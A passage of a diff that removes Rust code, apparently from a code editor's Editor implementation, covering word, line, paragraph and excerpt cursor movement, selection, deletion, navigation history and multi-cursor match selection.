self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::previous_word_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_previous_subword_start( - &mut self, - _: &SelectToPreviousSubwordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::previous_subword_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn delete_to_previous_word_start( - &mut self, - action: &DeleteToPreviousWordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - 
self.transact(window, cx, |this, window, cx| { - this.select_autoclose_pair(window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = if action.ignore_newlines { - movement::previous_word_start(map, selection.head()) - } else { - movement::previous_word_start_or_newline(map, selection.head()) - }; - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn delete_to_previous_subword_start( - &mut self, - _: &DeleteToPreviousSubwordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_autoclose_pair(window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = movement::previous_subword_start(map, selection.head()); - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn move_to_next_word_end( - &mut self, - _: &MoveToNextWordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - (movement::next_word_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn move_to_next_subword_end( - &mut self, - _: &MoveToNextSubwordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - (movement::next_subword_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn select_to_next_word_end( - &mut self, - _: &SelectToNextWordEnd, - window: &mut Window, - cx: &mut Context, - ) { - 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - (movement::next_word_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn select_to_next_subword_end( - &mut self, - _: &SelectToNextSubwordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - (movement::next_subword_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn delete_to_next_word_end( - &mut self, - action: &DeleteToNextWordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = if action.ignore_newlines { - movement::next_word_end(map, selection.head()) - } else { - movement::next_word_end_or_newline(map, selection.head()) - }; - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn delete_to_next_subword_end( - &mut self, - _: &DeleteToNextSubwordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = movement::next_subword_end(map, selection.head()); - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn move_to_beginning_of_line( - &mut self, - action: &MoveToBeginningOfLine, - window: &mut Window, - cx: &mut Context, - ) { - 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::indented_line_beginning( - map, - head, - action.stop_at_soft_wraps, - action.stop_at_indent, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_beginning_of_line( - &mut self, - action: &SelectToBeginningOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::indented_line_beginning( - map, - head, - action.stop_at_soft_wraps, - action.stop_at_indent, - ), - SelectionGoal::None, - ) - }); - }); - } - - pub fn delete_to_beginning_of_line( - &mut self, - action: &DeleteToBeginningOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|_, selection| { - selection.reversed = true; - }); - }); - - this.select_to_beginning_of_line( - &SelectToBeginningOfLine { - stop_at_soft_wraps: false, - stop_at_indent: action.stop_at_indent, - }, - window, - cx, - ); - this.backspace(&Backspace, window, cx); - }); - } - - pub fn move_to_end_of_line( - &mut self, - action: &MoveToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::line_end(map, head, action.stop_at_soft_wraps), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_line( - &mut self, - action: &SelectToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - 
self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::line_end(map, head, action.stop_at_soft_wraps), - SelectionGoal::None, - ) - }); - }) - } - - pub fn delete_to_end_of_line( - &mut self, - _: &DeleteToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_to_end_of_line( - &SelectToEndOfLine { - stop_at_soft_wraps: false, - }, - window, - cx, - ); - this.delete(&Delete, window, cx); - }); - } - - pub fn cut_to_end_of_line( - &mut self, - _: &CutToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_to_end_of_line( - &SelectToEndOfLine { - stop_at_soft_wraps: false, - }, - window, - cx, - ); - this.cut(&Cut, window, cx); - }); - } - - pub fn move_to_start_of_paragraph( - &mut self, - _: &MoveToStartOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::start_of_paragraph(map, selection.head(), 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_end_of_paragraph( - &mut self, - _: &MoveToEndOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::end_of_paragraph(map, selection.head(), 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_start_of_paragraph( - &mut self, - _: &SelectToStartOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::start_of_paragraph(map, head, 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_paragraph( - &mut self, - _: &SelectToEndOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::end_of_paragraph(map, head, 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_start_of_excerpt( - &mut self, - _: &MoveToStartOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::start_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Prev, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_start_of_next_excerpt( - &mut self, - _: &MoveToStartOfNextExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::start_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Next, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_end_of_excerpt( - &mut self, - _: &MoveToEndOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::end_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Next, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_end_of_previous_excerpt( - &mut self, - _: &MoveToEndOfPreviousExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::end_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Prev, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_start_of_excerpt( - &mut self, - _: &SelectToStartOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::start_of_excerpt(map, head, workspace::searchable::Direction::Prev), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_start_of_next_excerpt( - &mut self, - _: &SelectToStartOfNextExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::start_of_excerpt(map, head, workspace::searchable::Direction::Next), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_excerpt( - &mut self, - _: &SelectToEndOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::end_of_excerpt(map, head, workspace::searchable::Direction::Next), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_previous_excerpt( - &mut self, - _: &SelectToEndOfPreviousExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::end_of_excerpt(map, head, workspace::searchable::Direction::Prev), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_beginning( - &mut self, - _: &MoveToBeginning, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(vec![0..0]); - }); - } - - pub fn select_to_beginning( - &mut self, - _: &SelectToBeginning, - window: &mut Window, - cx: &mut Context, - ) { - let mut selection = self.selections.last::(cx); - selection.set_head(Point::zero(), SelectionGoal::None); - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(vec![selection]); - }); - } - - pub fn move_to_end(&mut self, _: &MoveToEnd, window: &mut Window, cx: &mut Context) { - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let cursor = self.buffer.read(cx).read(cx).len(); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(vec![cursor..cursor]) - }); - } - - pub fn set_nav_history(&mut self, nav_history: Option) { - self.nav_history = nav_history; - } - - pub fn nav_history(&self) -> Option<&ItemNavHistory> { - self.nav_history.as_ref() - } - - pub fn create_nav_history_entry(&mut self, cx: &mut Context) { - self.push_to_nav_history(self.selections.newest_anchor().head(), None, false, cx); - } - - fn push_to_nav_history( - &mut self, - cursor_anchor: Anchor, - new_position: Option, - is_deactivate: bool, - cx: &mut Context, - ) { - if let Some(nav_history) = self.nav_history.as_mut() { - let buffer = self.buffer.read(cx).read(cx); - let cursor_position = cursor_anchor.to_point(&buffer); - let scroll_state = self.scroll_manager.anchor(); - let scroll_top_row = scroll_state.top_row(&buffer); - drop(buffer); - - if let Some(new_position) = new_position { - let row_delta = (new_position.row as i64 - cursor_position.row as i64).abs(); - if row_delta < MIN_NAVIGATION_HISTORY_ROW_DELTA { - return; - } - } - - nav_history.push( - Some(NavigationData { - cursor_anchor, - cursor_position, - scroll_anchor: scroll_state, - scroll_top_row, - }), - Some(cursor_position.row), - cx, - ); - cx.emit(EditorEvent::PushedToNavHistory { - anchor: cursor_anchor, - is_deactivate, - }) - } - } - - pub fn select_to_end(&mut self, _: &SelectToEnd, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let buffer = self.buffer.read(cx).snapshot(cx); - let mut selection = self.selections.first::(cx); - selection.set_head(buffer.len(), SelectionGoal::None); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(vec![selection]); - }); - } - - pub fn select_all(&mut self, _: &SelectAll, window: &mut 
Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let end = self.buffer.read(cx).read(cx).len(); - self.change_selections(None, window, cx, |s| { - s.select_ranges(vec![0..end]); - }); - } - - pub fn select_line(&mut self, _: &SelectLine, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let mut selections = self.selections.all::(cx); - let max_point = display_map.buffer_snapshot.max_point(); - for selection in &mut selections { - let rows = selection.spanned_rows(true, &display_map); - selection.start = Point::new(rows.start.0, 0); - selection.end = cmp::min(max_point, Point::new(rows.end.0, 0)); - selection.reversed = false; - } - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections); - }); - } - - pub fn split_selection_into_lines( - &mut self, - _: &SplitSelectionIntoLines, - window: &mut Window, - cx: &mut Context, - ) { - let selections = self - .selections - .all::(cx) - .into_iter() - .map(|selection| selection.start..selection.end) - .collect::>(); - self.unfold_ranges(&selections, true, true, cx); - - let mut new_selection_ranges = Vec::new(); - { - let buffer = self.buffer.read(cx).read(cx); - for selection in selections { - for row in selection.start.row..selection.end.row { - let cursor = Point::new(row, buffer.line_len(MultiBufferRow(row))); - new_selection_ranges.push(cursor..cursor); - } - - let is_multiline_selection = selection.start.row != selection.end.row; - // Don't insert last one if it's a multi-line selection ending at the start of a line, - // so this action feels more ergonomic when paired with other selection operations - let should_skip_last = is_multiline_selection && selection.end.column == 0; - if !should_skip_last { - new_selection_ranges.push(selection.end..selection.end); - } - } - } - 
self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(new_selection_ranges); - }); - } - - pub fn add_selection_above( - &mut self, - _: &AddSelectionAbove, - window: &mut Window, - cx: &mut Context, - ) { - self.add_selection(true, window, cx); - } - - pub fn add_selection_below( - &mut self, - _: &AddSelectionBelow, - window: &mut Window, - cx: &mut Context, - ) { - self.add_selection(false, window, cx); - } - - fn add_selection(&mut self, above: bool, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let mut selections = self.selections.all::(cx); - let text_layout_details = self.text_layout_details(window); - let mut state = self.add_selections_state.take().unwrap_or_else(|| { - let oldest_selection = selections.iter().min_by_key(|s| s.id).unwrap().clone(); - let range = oldest_selection.display_range(&display_map).sorted(); - - let start_x = display_map.x_for_display_point(range.start, &text_layout_details); - let end_x = display_map.x_for_display_point(range.end, &text_layout_details); - let positions = start_x.min(end_x)..start_x.max(end_x); - - selections.clear(); - let mut stack = Vec::new(); - for row in range.start.row().0..=range.end.row().0 { - if let Some(selection) = self.selections.build_columnar_selection( - &display_map, - DisplayRow(row), - &positions, - oldest_selection.reversed, - &text_layout_details, - ) { - stack.push(selection.id); - selections.push(selection); - } - } - - if above { - stack.reverse(); - } - - AddSelectionsState { above, stack } - }); - - let last_added_selection = *state.stack.last().unwrap(); - let mut new_selections = Vec::new(); - if above == state.above { - let end_row = if above { - DisplayRow(0) - } else { - display_map.max_point().row() - }; - - 'outer: for selection in selections { - if selection.id == last_added_selection { - let range = 
selection.display_range(&display_map).sorted(); - debug_assert_eq!(range.start.row(), range.end.row()); - let mut row = range.start.row(); - let positions = - if let SelectionGoal::HorizontalRange { start, end } = selection.goal { - px(start)..px(end) - } else { - let start_x = - display_map.x_for_display_point(range.start, &text_layout_details); - let end_x = - display_map.x_for_display_point(range.end, &text_layout_details); - start_x.min(end_x)..start_x.max(end_x) - }; - - while row != end_row { - if above { - row.0 -= 1; - } else { - row.0 += 1; - } - - if let Some(new_selection) = self.selections.build_columnar_selection( - &display_map, - row, - &positions, - selection.reversed, - &text_layout_details, - ) { - state.stack.push(new_selection.id); - if above { - new_selections.push(new_selection); - new_selections.push(selection); - } else { - new_selections.push(selection); - new_selections.push(new_selection); - } - - continue 'outer; - } - } - } - - new_selections.push(selection); - } - } else { - new_selections = selections; - new_selections.retain(|s| s.id != last_added_selection); - state.stack.pop(); - } - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - if state.stack.len() > 1 { - self.add_selections_state = Some(state); - } - } - - pub fn select_next_match_internal( - &mut self, - display_map: &DisplaySnapshot, - replace_newest: bool, - autoscroll: Option, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - fn select_next_match_ranges( - this: &mut Editor, - range: Range, - reversed: bool, - replace_newest: bool, - auto_scroll: Option, - window: &mut Window, - cx: &mut Context, - ) { - this.unfold_ranges(&[range.clone()], false, auto_scroll.is_some(), cx); - this.change_selections(auto_scroll, window, cx, |s| { - if replace_newest { - s.delete(s.newest_anchor().id); - } - if reversed { - s.insert_range(range.end..range.start); - } else { - s.insert_range(range); - } - }); - } - - let 
buffer = &display_map.buffer_snapshot; - let mut selections = self.selections.all::(cx); - if let Some(mut select_next_state) = self.select_next_state.take() { - let query = &select_next_state.query; - if !select_next_state.done { - let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); - let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); - let mut next_selected_range = None; - - let bytes_after_last_selection = - buffer.bytes_in_range(last_selection.end..buffer.len()); - let bytes_before_first_selection = buffer.bytes_in_range(0..first_selection.start); - let query_matches = query - .stream_find_iter(bytes_after_last_selection) - .map(|result| (last_selection.end, result)) - .chain( - query - .stream_find_iter(bytes_before_first_selection) - .map(|result| (0, result)), - ); - - for (start_offset, query_match) in query_matches { - let query_match = query_match.unwrap(); // can only fail due to I/O - let offset_range = - start_offset + query_match.start()..start_offset + query_match.end(); - let display_range = offset_range.start.to_display_point(display_map) - ..offset_range.end.to_display_point(display_map); - - if !select_next_state.wordwise - || (!movement::is_inside_word(display_map, display_range.start) - && !movement::is_inside_word(display_map, display_range.end)) - { - // TODO: This is n^2, because we might check all the selections - if !selections - .iter() - .any(|selection| selection.range().overlaps(&offset_range)) - { - next_selected_range = Some(offset_range); - break; - } - } - } - - if let Some(next_selected_range) = next_selected_range { - select_next_match_ranges( - self, - next_selected_range, - last_selection.reversed, - replace_newest, - autoscroll, - window, - cx, - ); - } else { - select_next_state.done = true; - } - } - - self.select_next_state = Some(select_next_state); - } else { - let mut only_carets = true; - let mut same_text_selected = true; - let mut selected_text = None; - - let mut selections_iter 
= selections.iter().peekable(); - while let Some(selection) = selections_iter.next() { - if selection.start != selection.end { - only_carets = false; - } - - if same_text_selected { - if selected_text.is_none() { - selected_text = - Some(buffer.text_for_range(selection.range()).collect::()); - } - - if let Some(next_selection) = selections_iter.peek() { - if next_selection.range().len() == selection.range().len() { - let next_selected_text = buffer - .text_for_range(next_selection.range()) - .collect::(); - if Some(next_selected_text) != selected_text { - same_text_selected = false; - selected_text = None; - } - } else { - same_text_selected = false; - selected_text = None; - } - } - } - } - - if only_carets { - for selection in &mut selections { - let word_range = movement::surrounding_word( - display_map, - selection.start.to_display_point(display_map), - ); - selection.start = word_range.start.to_offset(display_map, Bias::Left); - selection.end = word_range.end.to_offset(display_map, Bias::Left); - selection.goal = SelectionGoal::None; - selection.reversed = false; - select_next_match_ranges( - self, - selection.start..selection.end, - selection.reversed, - replace_newest, - autoscroll, - window, - cx, - ); - } - - if selections.len() == 1 { - let selection = selections - .last() - .expect("ensured that there's only one selection"); - let query = buffer - .text_for_range(selection.start..selection.end) - .collect::(); - let is_empty = query.is_empty(); - let select_state = SelectNextState { - query: AhoCorasick::new(&[query])?, - wordwise: true, - done: is_empty, - }; - self.select_next_state = Some(select_state); - } else { - self.select_next_state = None; - } - } else if let Some(selected_text) = selected_text { - self.select_next_state = Some(SelectNextState { - query: AhoCorasick::new(&[selected_text])?, - wordwise: false, - done: false, - }); - self.select_next_match_internal( - display_map, - replace_newest, - autoscroll, - window, - cx, - )?; - } - } - 
Ok(()) - } - - pub fn select_all_matches( - &mut self, - _action: &SelectAllMatches, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - self.push_to_selection_history(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - self.select_next_match_internal(&display_map, false, None, window, cx)?; - let Some(select_next_state) = self.select_next_state.as_mut() else { - return Ok(()); - }; - if select_next_state.done { - return Ok(()); - } - - let mut new_selections = Vec::new(); - - let reversed = self.selections.oldest::(cx).reversed; - let buffer = &display_map.buffer_snapshot; - let query_matches = select_next_state - .query - .stream_find_iter(buffer.bytes_in_range(0..buffer.len())); - - for query_match in query_matches.into_iter() { - let query_match = query_match.context("query match for select all action")?; // can only fail due to I/O - let offset_range = if reversed { - query_match.end()..query_match.start() - } else { - query_match.start()..query_match.end() - }; - let display_range = offset_range.start.to_display_point(&display_map) - ..offset_range.end.to_display_point(&display_map); - - if !select_next_state.wordwise - || (!movement::is_inside_word(&display_map, display_range.start) - && !movement::is_inside_word(&display_map, display_range.end)) - { - new_selections.push(offset_range.start..offset_range.end); - } - } - - select_next_state.done = true; - self.unfold_ranges(&new_selections.clone(), false, false, cx); - self.change_selections(None, window, cx, |selections| { - selections.select_ranges(new_selections) - }); - - Ok(()) - } - - pub fn select_next( - &mut self, - action: &SelectNext, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.push_to_selection_history(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - 
self.select_next_match_internal( - &display_map, - action.replace_newest, - Some(Autoscroll::newest()), - window, - cx, - )?; - Ok(()) - } - - pub fn select_previous( - &mut self, - action: &SelectPrevious, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.push_to_selection_history(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let mut selections = self.selections.all::(cx); - if let Some(mut select_prev_state) = self.select_prev_state.take() { - let query = &select_prev_state.query; - if !select_prev_state.done { - let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); - let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); - let mut next_selected_range = None; - // When we're iterating matches backwards, the oldest match will actually be the furthest one in the buffer. - let bytes_before_last_selection = - buffer.reversed_bytes_in_range(0..last_selection.start); - let bytes_after_first_selection = - buffer.reversed_bytes_in_range(first_selection.end..buffer.len()); - let query_matches = query - .stream_find_iter(bytes_before_last_selection) - .map(|result| (last_selection.start, result)) - .chain( - query - .stream_find_iter(bytes_after_first_selection) - .map(|result| (buffer.len(), result)), - ); - for (end_offset, query_match) in query_matches { - let query_match = query_match.unwrap(); // can only fail due to I/O - let offset_range = - end_offset - query_match.end()..end_offset - query_match.start(); - let display_range = offset_range.start.to_display_point(&display_map) - ..offset_range.end.to_display_point(&display_map); - - if !select_prev_state.wordwise - || (!movement::is_inside_word(&display_map, display_range.start) - && !movement::is_inside_word(&display_map, display_range.end)) - { - next_selected_range = Some(offset_range); - break; - } - } - - if let 
Some(next_selected_range) = next_selected_range { - self.unfold_ranges(&[next_selected_range.clone()], false, true, cx); - self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { - if action.replace_newest { - s.delete(s.newest_anchor().id); - } - if last_selection.reversed { - s.insert_range(next_selected_range.end..next_selected_range.start); - } else { - s.insert_range(next_selected_range); - } - }); - } else { - select_prev_state.done = true; - } - } - - self.select_prev_state = Some(select_prev_state); - } else { - let mut only_carets = true; - let mut same_text_selected = true; - let mut selected_text = None; - - let mut selections_iter = selections.iter().peekable(); - while let Some(selection) = selections_iter.next() { - if selection.start != selection.end { - only_carets = false; - } - - if same_text_selected { - if selected_text.is_none() { - selected_text = - Some(buffer.text_for_range(selection.range()).collect::()); - } - - if let Some(next_selection) = selections_iter.peek() { - if next_selection.range().len() == selection.range().len() { - let next_selected_text = buffer - .text_for_range(next_selection.range()) - .collect::(); - if Some(next_selected_text) != selected_text { - same_text_selected = false; - selected_text = None; - } - } else { - same_text_selected = false; - selected_text = None; - } - } - } - } - - if only_carets { - for selection in &mut selections { - let word_range = movement::surrounding_word( - &display_map, - selection.start.to_display_point(&display_map), - ); - selection.start = word_range.start.to_offset(&display_map, Bias::Left); - selection.end = word_range.end.to_offset(&display_map, Bias::Left); - selection.goal = SelectionGoal::None; - selection.reversed = false; - } - if selections.len() == 1 { - let selection = selections - .last() - .expect("ensured that there's only one selection"); - let query = buffer - .text_for_range(selection.start..selection.end) - .collect::(); - let is_empty = 
query.is_empty(); - let select_state = SelectNextState { - query: AhoCorasick::new(&[query.chars().rev().collect::()])?, - wordwise: true, - done: is_empty, - }; - self.select_prev_state = Some(select_state); - } else { - self.select_prev_state = None; - } - - self.unfold_ranges( - &selections.iter().map(|s| s.range()).collect::>(), - false, - true, - cx, - ); - self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { - s.select(selections); - }); - } else if let Some(selected_text) = selected_text { - self.select_prev_state = Some(SelectNextState { - query: AhoCorasick::new(&[selected_text.chars().rev().collect::()])?, - wordwise: false, - done: false, - }); - self.select_previous(action, window, cx)?; - } - } - Ok(()) - } - - pub fn find_next_match( - &mut self, - _: &FindNextMatch, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - let selections = self.selections.disjoint_anchors(); - match selections.first() { - Some(first) if selections.len() >= 2 => { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges([first.range()]); - }); - } - _ => self.select_next( - &SelectNext { - replace_newest: true, - }, - window, - cx, - )?, - } - Ok(()) - } - - pub fn find_previous_match( - &mut self, - _: &FindPreviousMatch, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - let selections = self.selections.disjoint_anchors(); - match selections.last() { - Some(last) if selections.len() >= 2 => { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges([last.range()]); - }); - } - _ => 